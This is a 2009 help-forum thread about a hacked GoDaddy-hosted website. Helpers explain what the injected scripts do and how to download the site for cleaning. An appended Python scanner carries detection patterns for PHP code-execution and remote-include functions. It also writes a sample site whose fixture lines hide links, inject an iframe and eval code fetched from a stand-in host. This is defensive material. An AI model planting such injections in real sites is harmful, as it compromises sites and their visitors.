
breach of my website



#1 heads/tails


Posted 16 June 2009 - 04:37 PM

Hey folks first timer here.. In need of All your expertise, so don't hesitate to give your best shot, for at this point of frustration I'm all ears...

Just a quick background; I've owned my site for about 10 years, only with one major problem since, having the web builders stay around long enough so when I needed help they were around, well not so! This is this domain's second site version since 1999, and they (web builder) are nowhere to be found either.

So now the problem: It seems that somehow, someone has hijacked my site.

When confronting my host (Godaddy.com) they mention of my password of that site in which they host was weak and someone was able to I guess break in.

So I went to my admin. account to see if I would be able to remove the script and all that stuff (see below) and guess what? My admin. account page was gone! All they left was that junk below...
Also all the other pages have a scripting, and the Home page has hidden script written and also a hidden icon Ask.com.....

So what can I do to get my controls back and what can I do to remove whoever they are, and where are they on my computer?

I have small knowledge in this sort of stuff so be kind to me when suggesting to do this or that, I am not a Geek as you all are of which I respect now :)

Thx for any help you can give, in dire need... Heads/Tails

(from the Admin page)
Warning: session_start(): Cannot send session cookie - headers already sent by (output started at /home/content/m/a/t/matrixnu/html/matrix/admin/includes/application_top.php:8) in /home/content/m/a/t/matrixnu/html/matrix/admin/includes/functions/sessions.php on line 73

Warning: session_start(): Cannot send session cache limiter - headers already sent (output started at /home/content/m/a/t/matrixnu/html/matrix/admin/includes/application_top.php:8) in /home/content/m/a/t/matrixnu/html/matrix/admin/includes/functions/sessions.php on line 73

Warning: Cannot modify header information - headers already sent by (output started at /home/content/m/a/t/matrixnu/html/matrix/admin/includes/application_top.php:8) in /home/content/m/a/t/matrixnu/html/matrix/admin/includes/functions/general.php on line 128

EDIT: Removed malicious link

Edited by garmanma, 24 June 2009 - 05:48 PM.



 


#2 heads/tails


Posted 24 June 2009 - 04:47 PM

I'm stunned.. I actually stumped all you geeks out there? I thought this would be challenging but fixable for all you who love this stuff, and yet everyone is going after the easier stuff and staying away from this prob.. What's going on guys, come on! Challenge yourselves and help me out here....

#3 garmanma


Posted 24 June 2009 - 05:51 PM

Not everyone in this forum is used to working with servers, HTML code and whatnot
Those that are usually don't hang around here much
I will pass this along to some other people and see if we can get you some help

Edited by garmanma, 24 June 2009 - 07:22 PM.

Mark
why won't my laptop work?

Having grandkids is God's way of giving you a 2nd chance because you were too busy working your butt off the 1st time around
Do not send me PMs with problems that should be posted in the forums. Keep it in the forums, so everyone benefits
Become a BleepingComputer fan: Facebook and Twitter

#4 Grinler


Posted 25 June 2009 - 05:00 PM

First immediately change your godaddy password to something else.

Then connect via FTP and download the entire site. Then contact godaddy and explain the site was hacked and you would like to return your hosting account to defaults so that there is no content and everything is back to how it would be if you started a new account. You could just delete all of your files, but I can't tell you what files specifically are your content and godaddy folders.

Finally, you will need to go through each of your files and see if the html contains the scripts and clean it.

Just so you know, the hack does this:

The front page of your site has been hacked to show three links that go to pharmacy sites.

Then it uses php to download and show links from a site in Germany for 3 porn sites.

Then it runs two javascripts to open iframes to two sites. Both of these sites are down.

The last thing it does is use some php to try and execute commands found at another site. The file containing the commands does not do anything at this time.

#5 heads/tails


Posted 27 June 2009 - 01:49 PM

Thanks Grinler for the info; unfortunately not sure on how to download; (Then connect via FTP and download the entire site.)... And also ( Finally, you will need to go through each of your files and see if the html contains the scripts and clean it) how to step though the files...

I know I'm asking a lot but no webmaster and all in the past have been a disappointment in leaving me hanging, so have tried to do the best I can with the little I know.. thanks again for all your input... Heads/Tails

#6 heads/tails


Posted 27 June 2009 - 01:50 PM

I also want to thank garmanma for putting out the word in trying to get me help... I appreciate it very much... HeadsTails

#7 garmanma


Posted 27 June 2009 - 07:36 PM

Sorry we could not have been more helpful
Mark

#8 Grinler


Posted 29 June 2009 - 09:08 AM

Sorry for the delay. Lack of internet over the weekend :thumbsup:

To FTP your data off, log into the Godaddy and select Hosting -> My Hosting Account. Then click on the Manage account link. This will launch the control panel.

Once in the control panel click on the Content tab and then the ftp client. This will load a java based ftp client that you can use to download your site. On the left pane select/create a folder on your local computer to download the data. In the right pane, click on an item to select it, and then click on the Control+A button on your keyboard to select everything. Then click the << button to copy the files from your godaddy account to your local computer.

Once you do that we can continue cleaning the files.
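
The "go through each of your files" step from post #4, run over the local copy downloaded as described above, sketched as an added example (not code from the thread or from any poster). The patterns are assumed heuristics for the behaviours post #4 lists (hidden links, iframes, PHP fetching remote content, PHP executing fetched commands), and the sample site and its `example.invalid` hosts are constructed.

```python
import re
import tempfile
from pathlib import Path

# Heuristic patterns (assumptions for illustration, not signatures of this hack).
PATTERNS = {
    "iframe": re.compile(r"<iframe\b", re.I),
    "hidden-element": re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I),
    "php-remote-fetch": re.compile(
        r"\b(?:include|require|file_get_contents|fopen|readfile)\b[^;]*https?://", re.I),
    "php-code-exec": re.compile(
        r"\b(?:eval|assert|system|exec|passthru|shell_exec)\s*\(", re.I),
}
EXTENSIONS = {".php", ".inc", ".html", ".htm", ".js"}

def scan_tree(root):
    """Return {relative path: [(line number, pattern name, snippet), ...]}."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in EXTENSIONS:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        hits = [(n, name, line.strip()[:100])
                for n, line in enumerate(text.splitlines(), 1)
                for name, rx in PATTERNS.items() if rx.search(line)]
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report

def build_sample(root):
    """Write a constructed three-file site: one clean page, two with injections."""
    root = Path(root)
    (root / "about.html").write_text("<h1>About us</h1>\n<p>Contact page.</p>\n")
    (root / "index.html").write_text(
        "<h1>Home</h1>\n"
        '<div style="display:none"><a href="http://pills.example.invalid/">x</a></div>\n'
        "<script>document.write('<iframe src=\"http://frames.example.invalid/\">');</script>\n")
    (root / "footer.php").write_text(
        '<?php echo file_get_contents("http://links.example.invalid/list.txt"); ?>\n'
        '<?php eval(file_get_contents("http://cmd.example.invalid/c.txt")); ?>\n')

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for name, hits in scan_tree(tmp).items():
            for lineno, kind, snippet in hits:
                print(f"{name}:{lineno}: {kind}: {snippet}")
```

Hits are leads for manual review, not verdicts: iframes and hidden elements also occur in legitimate pages, and obfuscated injections can evade simple patterns, so a clean scan does not prove a clean site.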



